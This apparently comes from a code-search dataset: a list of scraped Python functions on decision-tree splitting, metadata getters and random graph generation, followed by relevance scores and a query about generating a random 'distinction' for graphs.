"def get_split(self,X,y):\n \n BEST_COL = 0\n BEST_SPLIT =0\n BEST_IMPUR = 99\n for i,feature in enumerate(X.T):\n arg_sort=np.argsort(feature) #Sort the feature for optimizing the find of splitting points\n feature= feature[arg_sort]\n y_sort = y[arg_sort]\n splits = self.possible_splits(feature,y_sort) #Get \n\n impur,splits = self.test_split(feature,y_sort,splits) #Get impurity for splitting points\n best_idx = np.argmin(impur)\n best_impur = impur[best_idx]\n \n if best_impur==0.0: #Found perfect split, terminate\n return(i,splits[best_idx])\n elif best_impur<BEST_IMPUR:\n BEST_IMPUR=best_impur\n BEST_SPLIT=splits[best_idx]\n BEST_COL=i\n return (BEST_COL,BEST_SPLIT)",
"def extract_info(self, docstring):\n pass",
"def info(self):\n return (self._title, self._version, self._descr)",
"def _get_dirname_information(self,\n dirname=None,\n config=\"\",\n grisim=\"\",\n grism_extinfo=None,\n dir_hdu=None):\n # check whether ANY direct image information exists\n if ((dirname is None) and (dir_hdu is None)):\n # set the grism image as direct image\n dirname = grisim\n dirname_extinfo = grism_extinfo\n\n elif ((dirname is not None) and (dir_hdu is None)):\n # load the configuration file;\n # determine the extension information\n conf = configfile.ConfigFile(getCONF(config))\n dirname_extinfo = get_ext_info(getDATA(grisim), conf)\n del conf\n\n elif ((dirname is not None) and (dir_hdu is not None)):\n # make by hand the extension information\n dirname_extinfo = {'axe_ext': dir_hdu, 'fits_ext': dir_hdu-1}\n\n else:\n # error and out\n err_msg = (\"Specifying NO direct image but a direct image HDU: \"\n \"{0:d} makrs NO sense!\".format(dir_hdu))\n raise aXeError(err_msg)\n\n # return the name and the extension info\n return dirname, dirname_extinfo",
"def _get_splitpoints_class_to_subclasses(self, l_adj_discr):\n std = numpy.std(l_adj_discr)\n return [i for i, discr in enumerate(l_adj_discr) if discr >= std * self.std_split]",
"def split(test_name):\n recipe, simple_test_name = test_name.split('.', 1)\n return recipe, simple_test_name",
"def split(pairs, dev_ratio):\n dev, test = [], []\n for p in pairs:\n if random.random() < dev_ratio:\n dev.append(p)\n else:\n test.append(p)\n\n return dev, test",
"def retrieve_step_info(self, observation):\n\n beacon_next, marine_next, self.distance_next = \\\n self.calc_distance(observation)\n\n obs, reward, done, info = super(Move2Beacon, self).retrieve_step_info(observation)\n\n self.distance = self.distance_next\n self.marine_center = marine_next\n self.beacon_center = beacon_next\n\n STATE = 0\n FIRST = 1\n LAST = 2\n PYSC2_SCORE = 3\n PYSC2_REWARD = 4\n AVAILABLE_ACTIONS = 5\n\n obs_mv2beacon = [obs[STATE],\n obs[FIRST],\n obs[LAST],\n obs[PYSC2_SCORE],\n obs[PYSC2_REWARD],\n obs[AVAILABLE_ACTIONS],\n self.distance,\n self.marine_center,\n self.beacon_center]\n\n return obs_mv2beacon, reward, done, info",
"def get_splits(self):\n\t\treturn self.k",
"def show_info(self):\n # attr[0] attr[1]\n attrs = [(self.TYP.value, 'nam'),\n ('Skill', 'skl')]\n # voeg ook alle stats en skills in deze lijst toe.\n for stat in Minimals:\n attrs.append((stat.value, stat.name))\n attrs.append(('Spell Battery', 'cur_bat'))\n for stat in StatType:\n attrs.append((stat.value, stat.name))\n for skill in SkillType:\n attrs.append((skill.value, skill.name))\n\n # nu alle mogelijkheden geladen zijn, ga dan aan de slag met diegene die van toepassing zijn\n attr_list = []\n\n import enum\n for attr in attrs:\n value_of_attr = self.get_value_of(attr[1])\n # uitzondering, 'wht' altijd gewoon weergeven\n if attr[0] == StatType.wht.value:\n # deze uitzondering geldt niet voor weapons en shields.\n if not isinstance(self.get_value_of('skl'), enum.Enum): # niet wanneer 'skl' een waarde heeft\n attr_list.append((attr[0], str(value_of_attr)))\n elif value_of_attr:\n if isinstance(value_of_attr, enum.Enum): # uitzondering alleen voor 'skl'\n value_of_attr = value_of_attr.value\n elif attr[0] == StatType.hit.value: # uitzondering alleen voor 'hit'\n value_of_attr = str(value_of_attr)+\"%\"\n attr_list.append((attr[0], str(value_of_attr)))\n\n return attr_list",
"def getPair(self, args):\r\n return self.name, self.getValue(args)",
"def unpack(self) -> Tuple[list, list, list, list, float, int, list]:\n # (nice to have) todo:refactor --> as a namedtuple\n unpacked_super = super().unpack()\n\n observations, actions, rewards, Q_values, trajectory_return, _trajectory_lenght = unpacked_super\n\n return observations, actions, rewards, Q_values, trajectory_return, _trajectory_lenght, self.V_estimates",
"def args(self):\n return (self._differences, self._description)",
"def get_statistics(self):\n\n return (self.func_id, self.instruction_count)",
"def _getSeparationWeightingForBlob(self, dataBlob):\n return self._separationWeighting_Random.valueForIntegerId(dataBlob.agentId)",
"def debug_info(self) -> t.List[t.Tuple[int, int]]:\n if self._debug_info:\n return [\n tuple(map(int, x.split(\"=\"))) # type: ignore\n for x in self._debug_info.split(\"&\")\n ]\n\n return []",
"def version_info():\r\n return tuple(map(int, __version__.split('.')))",
"def split_file(document: str):\n class_name, sep, assignment_name = document.partition(\"-\")\n try:\n assignment_name = assignment_name.split('.')[0].split('_')[0]\n except TypeError:\n pass\n return class_name, assignment_name",
"def best_split1(self,X,attributes):\n if (self.criterion==\"information_gain\"):\n global_if = float('-inf') # the highest value of varience seen so far\n attr , val = None, None\n for attribute in attributes[::-1]:\n attr_val = pd.Series(X[attribute].unique()).sort_values(ignore_index=True)\n last_val = attr_val[0]\n for i in range(1,attr_val.size):\n cur_val = attr_val[i]\n valc = round((last_val+cur_val)/2,4)\n last_val = cur_val\n cur_if = information_gain1(valc,X[attribute],X[\"Output\"],self.type)\n if (cur_if>global_if):\n global_if,attr,val = cur_if,attribute,valc\n return attr,val\n else:\n global_if = float('inf') # the lowest value of varience seen so far\n attr , val = None, None\n for attribute in attributes[::-1]:\n attr_val = pd.Series(X[attribute].unique()).sort_values(ignore_index=True)\n last_val = attr_val[0]\n for i in range(1,attr_val.size):\n cur_val = attr_val[i]\n valc = round((last_val+cur_val)/2,4)\n last_val = cur_val\n cur_if = gini_gain1(X[\"Output\"],X[attribute], valc)\n if (global_if>cur_if):\n global_if,attr,val = cur_if,attribute,valc\n return attr,val",
"def info(self) -> list[int]:",
"def _splitName(self, name):\n # splitting up the name\n try:\n arr = name.split(self.__dividerName__)\n except ValueError as err:\n logging.exception('Error processing annotation name: {}'.format(str(err)))\n logging.exception('Could not split name with divider {} from {}'.format(self.__dividerName__,name))\n\n if len(arr)!= self._nameColCount:\n raise ValueError(\"Malformed name entry '{}'. There must be {} fields separated by {}\".format(name,self._nameColCount,self.__dividerName__))\n \n geneID = arr[self.__indexGeneID__]\n geneSymbol = arr[self.__indexGeneSymbol__]\n UID = arr[self.__indexUID__]\n geneType = arr[self.__indexGeneType__]\n geneRegion = arr[self.__indexGeneRegion__]\n \n try:\n (genePositionNumber, genePositionTotal) = arr[self.__indexRegionPos__].split(self.__dividerRegion__)\n except ValueError as err:\n logging.exception('Error processing annotation name: {}'.format(str(err)))\n logging.exception('Could not split value with index {} with divider {} from {}'.format(self.__indexRegionPos__, \n self.__dividerRegion__,\n arr))\n \n # # empty string if not windowed. \n # annotationWindowNumber = windowNumber.zfill(self.__zeroFillWindow__) if isWindowed else \"\"\n # annotationWindowSeparator = \"W\" if isWindowed else \"\"\n \n if self._isWindowed:\n windowNumber = arr[self.__indexWindowNumber__]\n return (UID, geneID, geneSymbol, geneType, geneRegion, genePositionNumber, genePositionTotal, windowNumber)\n else:\n return (UID, geneID, geneSymbol, geneType, geneRegion, genePositionNumber, genePositionTotal)",
"def _split_name(name):\n name_split = name.split('_view_')\n view_num = None\n if(len(name_split) > 1):\n view_num = int(name_split[1])\n optimizer_key = ''\n fp16_key = ''\n if name_split[0].startswith('Moment_1'):\n optimizer_key = 'Moment_1_'\n elif name_split[0].startswith('Moment_2'):\n optimizer_key = 'Moment_2_'\n elif name_split[0].startswith('Update_Count'):\n optimizer_key = 'Update_Count_'\n elif name_split[0].endswith('_fp16'):\n fp16_key = '_fp16'\n param_name = name_split[0]\n if optimizer_key != '':\n param_name = param_name.split(optimizer_key)[1]\n param_name = param_name.split('_fp16')[0]\n return param_name, optimizer_key, view_num, fp16_key",
"def filenameSplit (p):\n\tfrom os.path import split as splitPath, splitdrive, splitext\n\t\n\tsplt = splitPath (p)\n\tdisk,dir_ = splitdrive(splt[0])\n\ttry:\n\t\tif disk[1] != \":\":\n\t\t\traise IndexError\n\texcept IndexError:\n\t\tdisk,dir_ = \"\", splt[0]\n\tname,ext = splitext(splt[1])\n\treturn disk,dir_,name,ext",
"def get_comp_spanrels(self):",
"def getInfoVariableNames(self, product):\r\n return []",
"def _genome_info_tuple(self, name, size=False):\n accession = self.assembly_accession(name)\n taxid = self.genome_taxid(name)\n annotations = bool(self.annotation_links(name))\n species = self.genomes[name].get(\"scientific_name\")\n other = self.genomes[name].get(\"genebuild\")\n if size:\n length = self.genomes[name][\"base_count\"]\n return name, accession, taxid, annotations, species, length, other\n return name, accession, taxid, annotations, species, other",
"def get_pair_to_merge(self) -> tuple:\n index = np.argmin(self.distance_matrix)\n min_dist_index = np.unravel_index(index, self.distance_matrix.shape)\n\n merge_confidence = self.get_merge_confidence(min_dist_index)\n if merge_confidence < self.threshold and self.intervention_counter < self.max_user_intervention:\n pool = self.create_pool(min_dist_index)\n if self.is_validation:\n pool_index = self.select_merge(pool)\n else:\n # aqui vai uma função de exibir para o usuário quais as opcoes de merge\n pass\n min_dist_index = pool[pool_index]\n\n self.intervention_counter += 1\n\n return min(min_dist_index), max(min_dist_index)",
"def get_opt_split(self, command):\n if \"split\" in self.command_dict[\"commands\"][command].keys():\n return self.command_dict[\"commands\"][command][\"split\"]\n else:\n return CommandDict.DEFAULT_OPT_SPLIT",
"def split_alg(self):\n return self._split_alg",
"def separatePlot(self,schematicInfo):\n compInfo = []\n plotInfo = []\n for eachline in schematicInfo:\n words = eachline.split()\n if words[0] == 'run':\n continue\n elif words[0] == 'plot' or words[0] == 'print':\n plotInfo.append(eachline)\n else:\n compInfo.append(eachline)\n return compInfo, plotInfo",
"def extract_cds_args(self, line):\n result = {'indices': [int(line[3]), int(line[4])], \\\n 'strand': line[6], 'phase': int(line[7])}\n if isinstance(line[7], float):\n result['score'] = line[7]\n attribs = self.parse_attributes(line[8])\n\n if not attribs:\n return None\n\n if 'name' in attribs:\n del attribs['name']\n \n result.update(attribs)\n return result",
"def catalog_components(self, catalog_name, split_ver):\n return sorted(self._split_comp_info_dicts[\"%s_%s\" % (catalog_name, split_ver)].keys())",
"def get_dists_2():\n d1 = Distribution(['0', '1'], [1 / 2, 1 / 2])\n d2 = Distribution(['0', '1'], [1 / 3, 2 / 3])\n d3 = Distribution(['0', '1'], [2 / 5, 3 / 5])\n return d1, d2, d3",
"def calcInfoGainBySplitValue(self, data, structure, colName, splitVal):\n result = self.calcDataEntropy(data, structure) - self.calcEntropyBySplitValue(data, structure, colName, splitVal)\n result = 0 if result < 0 else result\n return round(result, 3)",
"def __info_gain_from_splits(self, potential_integer_splits, sorted_data):\n info_gains = []\n for split in map(int, potential_integer_splits):\n left_child = sorted_data[sorted_data[:, 0].astype(int) < split, :]\n right_child = sorted_data[sorted_data[:, 0].astype(int) >= split, :]\n info_gains.append(self.__calc_info_gain(sorted_data, left_child,\n right_child))\n return info_gains",
"def _findTangentSplitAuto(self, angles):\n # get angles from points\n splits = []\n\n # get average variables\n minAngle = min(angles) or 0.00001\n maxAngle = max(angles)\n average = (minAngle + maxAngle) * 0.5\n mean = sum(angles) / len(angles) * 0.5\n\n # get value at which to split\n threshold = (math.log(average) - math.log(mean)) / (math.log(maxAngle) - math.log(minAngle)) * average\n\n # if curve is relatively smooth don't split\n if mean * 10 > average:\n return []\n\n # split based on angles\n for i, angle in enumerate(angles):\n if angle > threshold:\n splits.append(i + 1)\n\n return splits",
"def info(self):\n\n print(\"pixellisation:\", self.pixel)\n print(\"number of components:\", self.ncomp)\n print(\"number of pixels:\", self.data.shape[:] if self.ncomp == 1 else self.data.shape[1:])\n print(\"nside:\", self.nside)\n print(\"geometry:\", self.geometry)\n print(\"coordinates:\", self.coordinate)",
"def split_trials(self) -> tuple[list[Trial], list[Trial]]:\n\n trials: list[Trial] = []\n for trial in self.registry:\n if trial.status != \"completed\":\n trial = self.strategy.infer(trial)\n\n if trial is not None:\n trials.append(trial)\n # NOTE: This assumes that all trials have an objective. Making assumption explicit.\n assert all(trial.objective is not None for trial in trials)\n sorted_trials = sorted(trials, key=lambda trial: trial.objective.value) # type: ignore\n\n split_index = int(numpy.ceil(self.gamma * len(sorted_trials)))\n\n below = sorted_trials[:split_index]\n above = sorted_trials[split_index:]\n\n return below, above",
"def keys(self):\n\t\treturn tuple(self.dist.keys())",
"def csv_attribute_unpacker(self, attribute_tuples: List[Tuple[str, str]], separator: str = \",\") \\\n -> Tuple[List[str], List[str]]:\n\n if not attribute_tuples:\n raise ValueError(\"The list of tuples containing the attributes is missing.\")\n\n join_attributes_set: set = set()\n selection_attributes_set: set = set()\n\n for j_attribute_string, s_attribute_string in attribute_tuples:\n for j_attribute in j_attribute_string.split(separator):\n join_attributes_set.add(j_attribute.strip())\n\n for operator in self.operators:\n s_attribute_string = s_attribute_string.replace(separator + operator + separator, operator)\n\n for s_attribute in s_attribute_string.split(separator):\n for operator in self.operators:\n if operator in s_attribute:\n s_attribute = s_attribute.split(operator)[0].strip()\n selection_attributes_set.add(s_attribute)\n break\n\n return list(join_attributes_set), list(selection_attributes_set)",
"def test_split(self,X,y,splits):\n n_data = len(y) #Number of data points\n splits=(X[splits]+X[splits+1])/2\n\n idx_greater = (X>splits[:,None]) #index for greater split\n idx_lower = (X<splits[:,None]) #index for lower split\n\n imp_greater =[self.impurity(y[idx]) for idx in idx_greater] #impurity for greater\n imp_lower = [self.impurity(y[idx]) for idx in idx_lower] #impurity lower\n\n impur = [sum(idx_great)/n_data*imp_great+sum(idx_low)/n_data*imp_low for idx_great,imp_great,idx_low,imp_low in zip(idx_greater,imp_greater,idx_lower,imp_lower)] #Weighted impurity\n return (impur,splits)",
"def _GetStatAttribute(self):\n stat_attribute = attribute.StatAttribute()\n stat_attribute.device_number = self._fshfs_file_entry.device_number\n stat_attribute.group_identifier = self._fshfs_file_entry.group_identifier\n stat_attribute.inode_number = self._fshfs_file_entry.identifier\n stat_attribute.mode = self._fshfs_file_entry.file_mode\n stat_attribute.number_of_links = self._fshfs_file_entry.number_of_links\n stat_attribute.owner_identifier = self._fshfs_file_entry.owner_identifier\n stat_attribute.size = self._fshfs_file_entry.size\n stat_attribute.type = self.entry_type\n\n return stat_attribute",
"def get_widths(self) -> tuple:\n words_width = 0\n spaces_width = 0\n for part in self.line_parts:\n words_width += part.width\n spaces_width += part.spaces_width\n return words_width, spaces_width",
"def __repr__(self):\n return (f'Heuristic: {self.heuristic}\\n'\\\n f'Ancestors: {self.ancestors}\\n'\\\n f'Result: {self.result}\\n'\\\n f'Attributes: {self.attributes}\\n'\\\n f'Split Attribute: {self.split_attr}\\n'\\\n f'Has children: {self.val0 != None}\\n')",
"def extract_mol_info(molecule_etree):\n smiles = extract_smiles(molecule_etree)\n alpha = extract_and_check_alpha(molecule_etree)\n beta = extract_and_check_beta(molecule_etree)\n return smiles, alpha, beta",
"def _get_switch_info(switch_info, host_id):\n for switch_ip in switch_info:\n if host_id in switch_info[switch_ip]:\n info = switch_info[switch_ip][host_id].split(\",\")\n return (switch_ip, info[0], info[1:])\n return (None, None, None)",
"def calculate_separation(self, from_boid: b.Boid, boids: List[b.Boid]) -> Tuple[float, float]:\n separation_x = 0\n separation_y = 0\n for boid in boids:\n distance_squared = (boid.x - from_boid.x) ** 2 + (boid.y - from_boid.y) ** 2\n if distance_squared < self.boid_avoid_distance:\n separation_x -= (boid.x - from_boid.x)\n separation_y -= (boid.y - from_boid.y)\n return separation_x, separation_y",
"def _get_path_infomation(self):\n long_identifier = self._device_path.split('/')[4]\n protocol, remainder = long_identifier.split('-', 1)\n identifier, _, device_type = remainder.rsplit('-', 2)\n return (protocol, identifier, device_type)",
"def _get_attribute(self):\n return self.split_text[1] if len(self.split_text) > 1 else \"\"",
"def split_model_attr_lookups(self):\n return self.model_attr.split(\"__\")",
"def file_info(self, f):\n ld8 = self.ld8_extract(f) # get luna_date\n sid = self.sesid(ld8) # make luna_visitnum\n age = self.age_lookup.get(sid)\n return (sid, age)",
"def splitkeys(self):\n return sorted(self._split_comp_info_dicts.keys())",
"def _get_std(self):\n return (0.229, 0.224, 0.225)",
"def info() -> Dict[str, Any]:",
"def get_perfect_information(self):\n raise NotImplementedError",
"def split_dev_data(input_data: List[Tuple[str, int]]) -> Tuple[List[Tuple[str, int]],\n List[Tuple[str, int]],\n List[Tuple[str, int]]]:\n training_data, test_data = split_data(input_data)\n\n # split test data in half to test on\n dev_data = set(random.sample(test_data, int(len(test_data) / 2)))\n test_data = set(test_data) - set(dev_data)\n\n return list(training_data), list(test_data), list(test_data)",
"def get_infos(self):\n infos = dict()\n infos[\"dataset\"] = self.dataset_name\n infos[\"task\"] = \"separate_noisy\"\n infos[\"licenses\"] = [librispeech_license, tac_license]\n return infos",
"def get_best_split(rows: list) -> (float, Question):\n best_info_gain = 0\n best_question = None\n current_uncertainty = get_gini_impurity(rows)\n\n # minus 1 because we're ignoring the last column which is the label.\n n_attributes = len(rows[0]) - 1\n\n for col in range(n_attributes):\n\n # get all unique values for an attribute/column\n unique_values = set([row[col] for row in rows])\n\n for value in unique_values:\n question = Question(col, value)\n\n # Split rows depending on the question\n true_rows, false_rows = partition(rows, question)\n\n # We don't want to partition such rows\n if len(true_rows) == 0 or len(false_rows) == 0:\n continue\n\n # Get info gain from this split\n info_gain = get_info_gain(false_rows, true_rows, current_uncertainty)\n\n if info_gain > best_info_gain:\n best_info_gain, best_question = info_gain, question\n\n return best_info_gain, best_question",
"def _get_parameters(self):\n return (self.SYMBOL, self.parameterArray())",
"def split_line(self, line):\n # type: (str) -> tuple\n\n parts = [s.strip() for s in line.split('#', 1)]\n package = parts[0]\n comment = parts[1] if len(parts) >= 2 else ''\n\n return package, comment",
"def get_pd_info():\n pd_info = browser.find_element_by_class_name(\"pd_info\")\n h1 = pd_info.find_element_by_class_name(\"biggest_hed\").get_property(\"innerHTML\")\n second_label = pd_info.find_element_by_class_name(\"second_label\").get_property(\n \"innerHTML\"\n )\n patrol_area = (\n pd_info.find_element_by_class_name(\"town_description\")\n .find_element_by_class_name(\"left\")\n .find_element_by_class_name(\"town_label\")\n .get_property(\"innerHTML\")\n )\n\n return (h1, second_label, patrol_area)",
"def split(self, mD, mS, depth=0):\n self.i, self.v, groups, score = self.getSplit()\n if groups == None:\n return\n self.lt, self.gt = groups[0], groups[1]\n self.lt.atr.append((self.i, \"%.1f\" % self.v))\n self.gt.atr.append((self.i, \"%.1f\" % self.v))\n self.gt.header, self.gt.mut = self.header, self.mut\n self.lt.header, self.lt.mut = self.header, self.mut\n print(\"..\" * depth, \"[atr \", self.i, \" < \", \"%.2f\" % self.v, \"] gini -\",score, sep='')\n if self.lt == None or self.gt == None:\n self.lt = self.gt = self.mostCommon()\n return\n if len(self.lt) <= mS or depth > mD:\n if len(self.lt) == 0: self.lt = self.mostCommon()\n else: self.lt = self.lt.mostCommon()\n else:\n self.lt.split(mD, mS, depth + 1)\n if len(self.gt) <= mS or depth > mD:\n if len(self.gt) == 0: self.gt = self.mostCommon()\n else: self.gt = self.gt.mostCommon()\n else:\n self.gt.split(mD, mS, depth + 1)"
] | [
"0.71336925",
"0.58916134",
"0.5822264",
"0.5647063",
"0.5593051",
"0.54801464",
"0.5435515",
"0.5412464",
"0.52879655",
"0.5234384",
"0.5225578",
"0.5210046",
"0.5198215",
"0.5153649",
"0.5132074",
"0.51248753",
"0.5116866",
"0.5087405",
"0.5079402",
"0.50550914",
"0.50493884",
"0.49971977",
"0.49914074",
"0.49908942",
"0.49848998",
"0.49822626",
"0.49608043",
"0.49428394",
"0.4921116",
"0.49209914",
"0.4902202",
"0.48665956",
"0.48484161",
"0.48474714",
"0.48453528",
"0.4843011",
"0.4839663",
"0.48395923",
"0.4838699",
"0.48345047",
"0.4829209",
"0.48212448",
"0.4814804",
"0.48071256",
"0.47964168",
"0.4796407",
"0.47958148",
"0.4785246",
"0.47817728",
"0.4774701",
"0.47669375",
"0.47641778",
"0.47633514",
"0.47617903",
"0.47617775",
"0.47507045",
"0.47484714",
"0.47462788",
"0.47419643",
"0.474159",
"0.47399464",
"0.4738406",
"0.47368598",
"0.47354266",
"0.47352648",
"0.47224835",
"0.47148874",
"0.470701",
"0.47044414",
"0.4703407",
"0.46992588",
"0.46967083",
"0.4695204",
"0.46937972",
"0.4690267",
"0.46816486",
"0.46766135",
"0.4676521",
"0.46732783",
"0.46724832",
"0.46663207",
"0.4662095",
"0.4653509",
"0.46520033",
"0.46491224",
"0.46476805",
"0.46472237",
"0.4647194",
"0.4644408",
"0.4641791",
"0.46404916",
"0.46370444",
"0.46325758",
"0.46319544",
"0.4631772",
"0.4627414",
"0.4626924",
"0.46249297",
"0.46235892",
"0.46227005",
"0.46219265"
] | 0.0 | -1 |
Generates a random distinction of this type that is valid for the schema config.schema and for the given graphs. This function must take graphs as its first argument, and if it's a conjugate distinction it must then take, as separate args, not a tuple, | def getRandomDistinction(config, graphs, *base_distinctions):
raise AbstractMethodException(Distinction) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def generate_regular_graph(variable_names, dist_func, num_neigh=10, **kwargs):\n shuffle(variable_names)\n num_vars = len(variable_names)\n num_neigh = min(num_neigh, num_vars-1)\n graphs = nx.random_graphs.random_regular_graph(num_neigh, num_vars)\n edges = np.array(graphs.edges())\n edges.sort(axis=-1)\n\n return graph_from_edges(variable_names, dist_func, edges)",
"def generate_full(variable_names, dist_func, **kwargs):\n return generate_random_graph(variable_names, dist_func, edge_prob=1.0)",
"def simulate_random_dag(d: int,\n degree: float,\n graph_type: str,\n w_range: tuple = (0.5, 2.0)) -> nx.DiGraph:\n if graph_type == 'erdos-renyi':\n prob = float(degree) / (d - 1)\n B = np.tril((np.random.rand(d, d) < prob).astype(float), k=-1)\n elif graph_type == 'barabasi-albert':\n m = int(round(degree / 2))\n B = np.zeros([d, d])\n bag = [0]\n for ii in range(1, d):\n dest = np.random.choice(bag, size=m)\n for jj in dest:\n B[ii, jj] = 1\n bag.append(ii)\n bag.extend(dest)\n elif graph_type == 'full': # ignore degree, only for experimental use\n B = np.tril(np.ones([d, d]), k=-1)\n else:\n raise ValueError('unknown graph type')\n # random permutation\n P = np.random.permutation(np.eye(d, d)) # permutes first axis only\n B_perm = P.T.dot(B).dot(P)\n U = 1*np.random.uniform(low=w_range[0], high=w_range[1], size=[d, d])\n U[np.random.rand(d, d) < 0.5] *= -1\n W = (B_perm != 0).astype(float) * U\n G = nx.DiGraph(W)\n return G",
"def test_unique_graph(self):\n g0_graph = tf.Graph()\n with g0_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n g1_graph = tf.Graph()\n with g1_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n\n g0 = gde.Graph(g0_graph.as_graph_def())\n g1 = gde.Graph(g1_graph.as_graph_def())\n a0, b0, a1, b1 = (g0[\"a\"], g0[\"b\"], g1[\"a\"], g1[\"b\"])\n\n print(\"g0['a'] returns {} (type {})\".format(g0['a'], type(g0['a'])))\n\n # Same graph, should be fine.\n self.assertIsNone(gde.util.check_graphs(a0, b0))\n # Two different graphs, should assert.\n with self.assertRaises(ValueError):\n gde.util.check_graphs(a0, b0, a1, b1)\n # a0 and b0 belongs to the same graph, should be fine.\n self.assertEqual(gde.util.get_unique_graph([a0, b0]), g0)\n # Different graph, should raise an error.\n with self.assertRaises(ValueError):\n gde.util.get_unique_graph([a0, b0, a1, b1])",
"def generate_random_graph(variable_names, dist_func, edge_prob, connected=False, max_parents=-1, num_latents=0, **kwargs):\n shuffle(variable_names) # To have a random order\n num_vars = len(variable_names)\n\n # Generate random adjacency matrix with specified edge probability\n adj_matrix = np.random.binomial(n=1, p=edge_prob, size=(num_vars, num_vars))\n\n # Make sure that adjacency matrix is half diagonal\n for v_idx in range(num_vars):\n adj_matrix[v_idx, :v_idx+1] = 0\n\n # Nodes that do not have any parents or children are connected\n for v_idx in range(num_vars):\n has_connection = (adj_matrix[v_idx, :].any() or adj_matrix[:, v_idx].any())\n if not has_connection:\n con_idx = np.random.randint(num_vars-1)\n if con_idx >= v_idx:\n con_idx += 1\n adj_matrix[v_idx, con_idx] = True\n else:\n adj_matrix[con_idx, v_idx] = True\n\n # Ensure that a node has less than N parents\n if max_parents > 0:\n for v_idx in range(adj_matrix.shape[0]):\n num_parents = adj_matrix[:, v_idx].sum()\n if num_parents > max_parents:\n indices = np.where(adj_matrix[:, v_idx] == 1)[0]\n indices = indices[np.random.permutation(indices.shape[0])[:num_parents-max_parents]]\n adj_matrix[indices, v_idx] = 0\n\n # Connect nodes to one connected graph\n if connected:\n visited_nodes, connected_nodes = [], [0]\n while len(visited_nodes) < num_vars:\n while len(connected_nodes) > 0:\n v_idx = connected_nodes.pop(0)\n children = np.where(adj_matrix[v_idx, :])[0].tolist()\n parents = np.where(adj_matrix[:, v_idx])[0].tolist()\n neighbours = children + parents\n for n in neighbours:\n if (n not in visited_nodes) and (n not in connected_nodes):\n connected_nodes.append(n)\n if v_idx not in visited_nodes:\n visited_nodes.append(v_idx)\n if len(visited_nodes) < num_vars:\n node1 = np.random.choice(np.array(visited_nodes))\n node2 = np.random.choice(np.array([i for i in range(num_vars) if i not in visited_nodes]))\n adj_matrix[min(node1, node2), max(node1, node2)] = True\n connected_nodes.append(node1)\n\n # Add latent confounders \n if num_latents > 0:\n # Latent confounders are identified by their variable name \"X_{l,...}\"\n variable_names = [r\"$X_{l,%i}$\" % (i+1) for i in range(num_latents)] + variable_names\n # Latent confounders are added in the graph structure. When exporting the graph, \n # we remove those variables so that we can apply our structure learning algorithm\n # without any changes.\n node_idxs = [v_idx+num_latents for v_idx in range(num_vars)\n if (adj_matrix[:, v_idx].sum() < max_parents or max_parents <= 0)]\n adj_matrix = np.concatenate([np.zeros((num_latents, num_vars)), adj_matrix], axis=0)\n adj_matrix = np.concatenate([np.zeros((num_vars+num_latents, num_latents)), adj_matrix], axis=1)\n # Randomly select the node pairs on which we want to have a latent confounder\n latent_children = []\n for l in range(num_latents):\n node_pair = None\n # We sample unique node pairs where there exists no direct edge between both nodes\n while node_pair is None or node_pair in latent_children or adj_matrix[node_pair[0], node_pair[1]]:\n node_pair = random.sample(node_idxs, k=2)\n node_pair = sorted(node_pair)\n latent_children.append(node_pair)\n adj_matrix[l, node_pair[0]] = 1\n adj_matrix[l, node_pair[1]] = 1\n latents = np.array([[i]+lc for i, lc in enumerate(latent_children)])\n else:\n latents = None\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix, latents=latents)",
"def test_CreateRandomGraph(\n node_x_dimensionality: int,\n node_y_dimensionality: int,\n graph_x_dimensionality: int,\n graph_y_dimensionality: int,\n):\n g = random_networkx_generator.CreateRandomGraph(\n node_x_dimensionality=node_x_dimensionality,\n node_y_dimensionality=node_y_dimensionality,\n graph_x_dimensionality=graph_x_dimensionality,\n graph_y_dimensionality=graph_y_dimensionality,\n )\n for _, data in g.nodes(data=True):\n assert len(data[\"x\"]) == node_x_dimensionality\n assert len(data[\"y\"]) == node_y_dimensionality\n assert len(g.graph[\"x\"]) == graph_x_dimensionality\n assert len(g.graph[\"y\"]) == graph_y_dimensionality",
"def _randomize(self):\n return self.graph",
"def generate_chain(variable_names, dist_func, **kwargs):\n shuffle(variable_names) # To have a random order\n num_vars = len(variable_names)\n\n adj_matrix = np.zeros((num_vars, num_vars), dtype=np.bool)\n for v_idx in range(num_vars-1):\n adj_matrix[v_idx, v_idx+1] = True\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix)",
"def test_random_node_disconnected_graphs(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g7, 'a', 'b'),\n (3, ['a', 'c', 'b']))",
"def generate_collider(variable_names, dist_func, **kwargs):\n shuffle(variable_names)\n num_vars = len(variable_names)\n\n adj_matrix = np.zeros((num_vars, num_vars), dtype=np.bool)\n adj_matrix[:-1, -1] = True\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix)",
"def generate_test_graph(sameDomain = False):\n num = 100\n\n urls = []\n emails = []\n nodes={}\n if sameDomain:\n domain = generate_domainname()\n else:\n domain = None\n for i in range(num):\n urls.append(generate_url(domain))\n emails.append(generate_email())\n \n used_urls = set()\n used_emails = set()\n for u in urls:\n l = random.choices(urls, k = floor(num/4))\n #l = [u for u in urls]\n e = random.choices(emails, k = floor(num/10))\n #e = [e for e in emails]\n used_urls.update(l)\n used_emails.update(e)\n nodes[u] = testNode(u, l, e)\n nodes[u].generate_page()\n \n return nodes, urls, emails",
"def generate_bidiag(variable_names, dist_func, **kwargs):\n shuffle(variable_names)\n num_vars = len(variable_names)\n\n adj_matrix = np.zeros((num_vars, num_vars), dtype=np.bool)\n for v_idx in range(num_vars-1):\n adj_matrix[v_idx, v_idx+1] = True\n if v_idx < num_vars - 2:\n adj_matrix[v_idx, v_idx+2] = True\n\n return graph_from_adjmatrix(variable_names, dist_func, adj_matrix)",
